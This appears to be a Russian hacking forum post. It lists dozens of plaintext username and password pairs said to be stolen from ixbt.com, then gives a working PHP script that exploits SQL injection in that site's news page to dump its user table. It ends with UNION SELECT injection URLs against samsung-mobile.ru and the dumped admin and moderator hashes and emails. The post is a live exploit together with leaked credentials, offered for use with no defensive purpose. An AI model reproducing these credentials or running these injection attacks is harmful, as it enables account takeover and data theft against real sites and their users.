|
Новичок
Регистрация: 16.01.2006
Сообщений: 24
Провел на форуме: 87233
Репутация:
63
|
|
www.ixbt.com:
===================
unclesam;superpassword
archont;nre11pk
alien;qwos93qrt
star;ver3new
root;another_enter
maxim;vtykytkq
eightn;rvcrrxxr
Cormac;corm
alexcob;mOpoNitO
axbat;se9rq1hM
kryakvina;elf15w40
-bsv-;Hobotrulitadnaznachna
sherbakovs;Rt4df56gZ
rwpbb;ymtupknl
Thunder;Ghtd6fGkl
WSiberian;Ahde9oyeni
Anvakams;fgs6hJKl9
lemar;dfddfkjf
PageEnd;let67dHjk
Neo;dghlo53FUki
digitalhome;superpassword
bess;ehyj2hrf
Sen;sdklt673GhD
Accent;ghetYJkl73LdS
evgeniy;eferwg
BlackCat;dfGt56kLsV
sergeyk;gfsl563gHtW
san-red;gHj952KlD
bugz;sdo349FgHy
jin;gsDfK729Fger
ElenaN;gdHjKl56dE3
PHP код:
<?
echo "<pre>\n";
@set_time_limit(0);
@ini_set("display_errors","0");
$hostname = gethostbyname('www.ixbt.com');
function getid($limit)
{
global $hostname;
$responce = "";
$fsock = fsockopen($hostname,80,$errnum,$errstr,2);
$headers = "GET http://www.ixbt.com/news/news.php?id=-99+union+select+1,2,CONCAT(CHAR(60,115,113,108,62),login,CHAR(59),password,CHAR(60,47,115,113,108,62)),4,5,6,7,8%20,9,10,11%20from%20user%20limit%20$limit,1/* HTTP/1.1\n";
$headers .= "Host: www.ixbt.com\n";
$headers .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\n";
$headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
$headers .= "Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3\n";
$headers .= "Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7\n";
$headers .= "Keep-Alive: 500\n";
$headers .= "Connection: close\n";
$headers .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";
fwrite ($fsock,$headers);
while (!feof($fsock)) $responce .= fread($fsock,1024);
fclose ($fsock);
$patern = "#<[\s]*sql[\s]*>([^<]*)<[\s]*/sql[\s]*>#i";
if(preg_match($patern, $responce, $rez)) echo $rez[1]; else echo 'Something not right...';
}
for($i=1;$i<32;$i++) {getid($i);echo "\n";}
echo "</pre>";
?>
про самсунг:
http://www.samsung-mobile.ru/news.php?id=-99+UNION+SELECT+1,2,CONCAT_WS(CHAR(59),user_id,use r_name,user_real_name,user_password,user_newpasswo rd,user_email),4,5,6+from+user/*
1;Wikiadmin;;3538bde67069fb42237f004aae66f73b;;
user_login,user_pass,user_icq,user_email,user_doma in,user_activation_key
http://www.samsung-mobile.ru/news.php?id=-99+UNION+SELECT+1,2,CONCAT_WS(CHAR(59),user_login, user_pass,user_icq,user_email,user_domain,user_act ivation_key),4,5,6+from+blog_users/*
admin;dfed24dcf4255aa50fe4a7ebf291cece;0;post@sams ung-mobile.ru;;
Moderator;d8578edf8458ce06fbc5bb76a58c5ca4;0;post@ samsung-mobile.ru;;
|